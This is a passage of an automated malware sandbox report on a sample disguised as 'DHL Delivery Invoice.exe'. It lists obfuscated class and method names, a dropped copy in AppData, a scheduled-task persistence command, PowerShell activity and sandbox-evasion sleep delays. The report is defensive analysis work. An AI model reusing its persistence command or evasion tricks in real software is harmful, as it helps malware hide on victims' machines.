                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csHigh entropy of concatenated method names: 'AAjhoMgorH', 'bI0hWpRlfO', 'ST2h0PYG1L', 'MNih32ZIyu', 'oVwhxlxglw', 'sI4hZkDFpv', 'QfKh8RD9Tu', 'U4XhU2OIHX', 'a0rhPJJaTk', 'RmJh6eVvq4'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, Dd2Bi7JvwPWUxrQeTw.csHigh entropy of concatenated method names: 'm6SMtHkp2K', 'AejMA47DFm', 'ubxMl6icFV', 'ywiMQWmdeN', 'pJRMVg7xjp', 'hRWMvvM1Pr', 'D9XMc9G80J', 'HHCMTpQAHR', 'fYoMFmhp5e', 'coJMeBhc3Q'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, bKGaGCfN9r8b3dAxfR.csHigh entropy of concatenated method names: 'BWh85jVV9w', 'l4t8402TsD', 'U3i8b96aHo', 'eyS8pGBfjH', 'qyM8EUjIQZ', 'GLT8DjxZdi', 'sMH8BOZdEm', 'NkJ8t0HKt1', 'je68AZNDDD', 'iH48XqcaoE'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, psJmfbcnh2UHCfO6X1.csHigh entropy of concatenated method names: 'doi8WEr9EH', 'WiC83D7CGt', 'xLP8Z4u0V8', 'dQZZOU2Bxt', 'THjZzlHolR', 'Hak821U2DW', 'lP28Yeyepr', 'NNy8NwM91q', 'G4r8haSOiV', 'dxr8uWgWUo'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, nlClL9RBjENyMP58Sf.csHigh entropy of concatenated method names: 'ToString', 'euG9e2dejU', 'Utj9QoUb4N', 'LXg9KAVG8L', 'O3D9Va80Ak', 'OtM9vFJWRr', 'Sbq9kP6okc', 'gkX9c4qXrP', 'MP29TAq7Cp', 'SuS9fIIIVn'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, YfCfd4O8KR8Cn3tWPs.csHigh entropy of concatenated method names: 'x34C31kRmi', 'KfeCxU9JBD', 'yObCZKn68F', 'fKsC8DdcLP', 'eWXCyk7Ysm', 'AsdCUju54q', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, MKu06VYhTUgWX8T7pex.csHigh entropy of concatenated method names: 'IgHrOG1xwL', 'TJZrz8Uc9u', 'Xftg2BptFh', 'AxRuDZHPEhewdED7evS', 'nLXmqPHdwlEaly45t7y', 'u159PWHH02DLxmNGMEn', 'vdW1SgHK0WCWLquc8iu'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, EBoOdSlDPIU1RApnZW.csHigh entropy of concatenated method names: 'mtkZovqfLX', 'wCEZ00W1Y8', 'b4dZxQIqrY', 'OBIZ85XOT0', 't8pZUMqrA3', 'EsMx1Tm4XQ', 'MSAxjBM9Ha', 'E1sxIgGVdR', 'MEVxLaQr0Q', 'CvRxq6FcG2'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, W3NEvE0F9vk3mc0EGh.csHigh entropy of concatenated method names: 'Dispose', 'wI4YqGaRjO', 'DN4NQALee0', 'DwOCGjEhbn', 'FaXYOlPf4U', 'NT8YzIB8jv', 'ProcessDialogKey', 'GU7N210FOI', 'hRwNYJJSDB', 'B6TNNOfCfd'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, s3M8YEIWMsI4GaRjOl.csHigh entropy of concatenated method names: 'bugyGBoTgU', 'WGqynxvpqV', 'Y65yykZFHl', 'Bw1yrK8Sda', 'wQdyS3WG8L', 'yUfyHmPour', 'Dispose', 'xm97W2QMaX', 'MQI70HKbc0', 'ftQ73CAtHG'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, hRi78eY2vqba3sjOFgE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I9ECeMD3Be', 'V7uCmdZEVp', 'DUACJqGCPo', 'zGBCaJLRaI', 'e2UCweY0vY', 'B5mCRL99YO', 'basCiefJ48'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, eV2UW4jMaGcT6OE5sg.csHigh entropy of concatenated method names: 'SGunLTe1Ci', 'j7qnOu7cyQ', 'SIw72kttqG', 'aMw7YWFGKM', 'OPxneH03Rd', 'tRfnmu29hG', 'oG3nJ43Uu3', 'ffvnay4Otc', 'U01nwdlkB7', 'vlcnReSL8C'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, AhqLRAzDifvQitaSMY.csHigh entropy of concatenated method names: 'DCFCDWkHne', 'aXuCtm2uA0', 'syxCAUKMAw', 'nkHCl5SYBX', 'J5QCQIT6kv', 'kniCVfuZ7R', 'BgkCvf2jmp', 'C8NCH66Sd0', 'mpWC5t7OQe', 'uKEC4rx5Q4'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, KY302Gupdo3G84DdV4.csHigh entropy of concatenated method names: 'bXdY8W3n9D', 'sUKYUVoFXJ', 'ssLY6YVfId', 'jX6YddeoOi', 'bk2YGaJABo', 'YdSY9DPIU1', 'NILI6LxygqnmD3FF7L', 'Ywwe2RJBb2JYGBoSb6', 'eTBYYye0Wr', 'O7eYhisBv7'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, nW3n9DtCUKVoFXJXYL.csHigh entropy of concatenated method names: 'ItS0a5Vmaf', 'NM30wMKDOW', 'A3D0RdZ0pm', 'uxH0iEAGsA', 'UOZ014kgnD', 'rci0j7Cmp3', 'IPa0IoI4jD', 'jFl0LRRsru', 'sR90qOhksn', 'Pj80OInC4h'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, r10FOIq3RwJJSDBE6T.csHigh entropy of concatenated method names: 'HDpyloxufv', 'UXbyQr7Exk', 'uV9yKNI40X', 'ONcyVAUINA', 'DLoyv6KpFC', 'F6Gyk4HyUT', 'C7OycQvjwd', 'nNKyT9JaaA', 'JY0yfaoaSS', 'qQOyF5ZlyA'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, ak9TLTYYo3XPXTuLLCn.csHigh entropy of concatenated method names: 'xNYCOKTpuf', 'zvTCz9VAKk', 'TQMr2AXJ8U', 'CV9rYJ2GvD', 'afqrNn5Qxd', 'tI8rhCSCmE', 'pl5ruDHxHN', 'uB7roHWyaD', 'Jo6rWOwvyI', 'GNBr0HYXa1'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, zYIKPrYuoh0gmw1dmks.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tRLgyXWa0d', 'lGfgCRuOBk', 'lxwgrgl0Cw', 'XJvggt3EmU', 'sH8gSFkv16', 'kxVgs4W9Be', 'hcjgHVdmaL'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, aQHQCCAsLYVfId8X6d.csHigh entropy of concatenated method names: 'svN3pGU1xV', 'GZH3Dwkw0K', 'Yi73tbOLXZ', 'MMe3AyhHyN', 'a383GIXmrL', 'afr39fbhNy', 'jJb3nU6p31', 'wrs37kjo6t', 'd7H3yCIgCQ', 'k943CsXx3f'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, raUZwtankETy9DHvxq.csHigh entropy of concatenated method names: 'XhrGFsC4wL', 'vBAGmH8YWu', 'Qw6Ga2sDav', 'FA6GwG9cYM', 'GpXGQ1PsPR', 'BMRGKj6HGB', 'qypGVSmjYs', 'U58GvNaKnO', 'P2pGkpsslL', 'NvrGcR2npg'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, blCDnlN5aw2LgftDY2.csHigh entropy of concatenated method names: 'sjJbBFGs7', 'rj4pypSxr', 'rZeDQ77cn', 'rAMB9sUrE', 'A30ARZ4u7', 'UYEXSrS17', 'uXkQ7dI4E8cViZ1ScI', 'ihfvoSTDHhvJljB0Kq', 'J9n7EOqgG', 'd7YC6W9DO'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, OoOiy3XUylJnXYk2aJ.csHigh entropy of concatenated method names: 'JrpxEY5y53', 'WThxBSXAvl', 'PyG3KdQNVv', 'XEg3VvcDXO', 'Ytc3vGQcCN', 'BmD3kkobU2', 'jdk3c2xSEf', 'u3F3T0CwYf', 'Ltw3flFFZk', 'Duc3Fl4i46'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csHigh entropy of concatenated method names: 'AAjhoMgorH', 'bI0hWpRlfO', 'ST2h0PYG1L', 'MNih32ZIyu', 'oVwhxlxglw', 'sI4hZkDFpv', 'QfKh8RD9Tu', 'U4XhU2OIHX', 'a0rhPJJaTk', 'RmJh6eVvq4'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, Dd2Bi7JvwPWUxrQeTw.csHigh entropy of concatenated method names: 'm6SMtHkp2K', 'AejMA47DFm', 'ubxMl6icFV', 'ywiMQWmdeN', 'pJRMVg7xjp', 'hRWMvvM1Pr', 'D9XMc9G80J', 'HHCMTpQAHR', 'fYoMFmhp5e', 'coJMeBhc3Q'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, bKGaGCfN9r8b3dAxfR.csHigh entropy of concatenated method names: 'BWh85jVV9w', 'l4t8402TsD', 'U3i8b96aHo', 'eyS8pGBfjH', 'qyM8EUjIQZ', 'GLT8DjxZdi', 'sMH8BOZdEm', 'NkJ8t0HKt1', 'je68AZNDDD', 'iH48XqcaoE'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, psJmfbcnh2UHCfO6X1.csHigh entropy of concatenated method names: 'doi8WEr9EH', 'WiC83D7CGt', 'xLP8Z4u0V8', 'dQZZOU2Bxt', 'THjZzlHolR', 'Hak821U2DW', 'lP28Yeyepr', 'NNy8NwM91q', 'G4r8haSOiV', 'dxr8uWgWUo'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, nlClL9RBjENyMP58Sf.csHigh entropy of concatenated method names: 'ToString', 'euG9e2dejU', 'Utj9QoUb4N', 'LXg9KAVG8L', 'O3D9Va80Ak', 'OtM9vFJWRr', 'Sbq9kP6okc', 'gkX9c4qXrP', 'MP29TAq7Cp', 'SuS9fIIIVn'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, YfCfd4O8KR8Cn3tWPs.csHigh entropy of concatenated method names: 'x34C31kRmi', 'KfeCxU9JBD', 'yObCZKn68F', 'fKsC8DdcLP', 'eWXCyk7Ysm', 'AsdCUju54q', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, MKu06VYhTUgWX8T7pex.csHigh entropy of concatenated method names: 'IgHrOG1xwL', 'TJZrz8Uc9u', 'Xftg2BptFh', 'AxRuDZHPEhewdED7evS', 'nLXmqPHdwlEaly45t7y', 'u159PWHH02DLxmNGMEn', 'vdW1SgHK0WCWLquc8iu'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, EBoOdSlDPIU1RApnZW.csHigh entropy of concatenated method names: 'mtkZovqfLX', 'wCEZ00W1Y8', 'b4dZxQIqrY', 'OBIZ85XOT0', 't8pZUMqrA3', 'EsMx1Tm4XQ', 'MSAxjBM9Ha', 'E1sxIgGVdR', 'MEVxLaQr0Q', 'CvRxq6FcG2'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, W3NEvE0F9vk3mc0EGh.csHigh entropy of concatenated method names: 'Dispose', 'wI4YqGaRjO', 'DN4NQALee0', 'DwOCGjEhbn', 'FaXYOlPf4U', 'NT8YzIB8jv', 'ProcessDialogKey', 'GU7N210FOI', 'hRwNYJJSDB', 'B6TNNOfCfd'
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe File created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: DHL Delivery Invoice.exe PID: 6724, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: LIWBHGsz.exe PID: 2852, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 28B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 2B10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 28B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 5090000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 6090000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 61C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 71C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: B3B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: C3B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: C840000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: D840000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: DA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: 27C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Memory allocated: DA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 3100000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 5640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 6640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 6770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 7770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: B580000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: C580000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: CA10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 3050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 3110000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Memory allocated: 5110000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 3938
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5962
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 613
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Window / User API: threadDelayed 3434
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Window / User API: threadDelayed 6426
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Window / User API: threadDelayed 2037
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, Window / User API: threadDelayed 7784
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 6752, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 348, Thread sleep count: 3938 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 708, Thread sleep count: 170 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3872, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5052, Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -27670116110564310s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99672s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99561s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99453s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99343s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99234s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99125s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -99015s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98906s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98796s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98685s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98578s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98468s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98359s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98250s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98140s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -98019s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97905s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97797s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97687s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97578s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97468s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97357s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97249s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97140s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -97031s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96921s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96812s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96703s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96593s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96484s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96375s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96265s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96156s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -96047s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95936s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95828s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95718s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95597s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95484s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95375s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95265s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95156s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -95047s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -94936s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -94828s >= -30000s
